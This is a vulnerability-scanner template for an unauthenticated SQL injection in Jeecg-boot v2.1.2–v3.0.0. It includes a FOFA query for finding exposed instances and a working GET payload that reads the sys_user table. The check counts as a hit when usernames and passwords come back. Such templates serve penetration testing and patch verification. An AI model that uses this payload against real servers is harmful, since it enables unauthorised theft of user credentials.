id: Jeecg-boot v2.1.2-v3.0.0 后台未授权SQL注入漏洞

info:
  name: Jeecg-boot v2.1.2-v3.0.0 后台未授权SQL注入漏洞
  author: free2e
  severity: high
  verified: true
  description: |-
    Jeecg-boot v2.1.2-v3.0.0 后台未授权SQL注入漏洞存在未授权注入漏洞,可以未授权构造sql语句,获取信息。
    fofa-query: title=="JeecgBoot 企业级低代码平台"
  affected: Jeecg-boot v2.1.2-v3.0.0
  solutions: https://github.com/jeecgboot/jeecg-boot/commit/
  reference:
    - https://xz.aliyun.com/t/13186?time__1311=mqmxnDBDcD2A0%3DGODlxGORzQb%3Dqj2YS20iD&alichlgref=https%3A%2F%2Fwww.google.com.hk%2F
  tags: Jeecg-boot,sqli,unauthorized,unauth
  created: 2024/04/02

rules:
  r0:
    request:
      method: GET
      path: /jeecg-boot//sys/ng-alain/getDictItemsByTable/' from sys_user/*, '/x.js
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"username":') &&
      response.body.bcontains(b'"password":') &&
      response.body.bcontains(b'"create_time":')
expression: r0()